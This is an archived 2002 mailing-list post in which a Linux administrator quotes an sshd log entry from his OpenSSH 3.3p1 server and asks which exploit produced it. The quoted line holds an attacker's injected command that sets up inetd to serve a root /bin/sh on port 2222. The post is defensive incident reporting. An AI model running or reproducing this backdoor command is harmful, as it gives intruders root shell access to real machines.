|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
From: Ulrich Keil (ulrich
der-keiler.de)Date: Sat Jun 29 2002 - 15:01:51 CDT
I run OpenSSH 3.3p1 on linux (sparc) and found these line in my
/var/log/messages:
Jun 28 22:27:27 www sshd[21761]: Bad protocol version identification
'echo "2222 stream tcp nowait root /bin/sh sh -i">>
/tmp/h;/usr/sbin/inetd /tmp/hn/inecho "2222 strea' from 192.192.230.233
Doesn't look like the OpenSSH exploit for OpenBSD 3.1 posted by
Christophe Devine on Bugtraq
(www.der-keiler.de/Mailing-Lists/securityfocus/bugtraq/2002-06/0354.html)
to me.
Is another exploit known which produces such an output?
Ulrich Keil
-- http://www.der-keiler.de PGP Fingerprint: 5FA4 4C01 8D92 A906 E831 CAF1 3F51 8F47 1233 9AAD Public key available at http://www.der-keiler.de/uk/pgp-key.asc-----BEGIN GEEK CODE BLOCK----- Version: 3.12 GCS d- s-:- a-- C++ UL+++ P++ L+++ E--- W+++ N++ o- K- w-- O- M- V- PS PE Y+ PGP++ t+ 5 X R tv b+ DI- D++ G e h-- r++ y+ ------END GEEK CODE BLOCK------
-----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (GNU/Linux) Comment: Weitere Infos: siehe http://www.gnupg.org
iD8DBQE9HhIrP1GPRxIzmq0RAqoXAKDkDDKKn9C0Vy9rrMJCgGIA9ep5EQCeNErc k8fz4SOgxMRyaTyR4QjbIhM= =WTy9 -----END PGP SIGNATURE-----
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]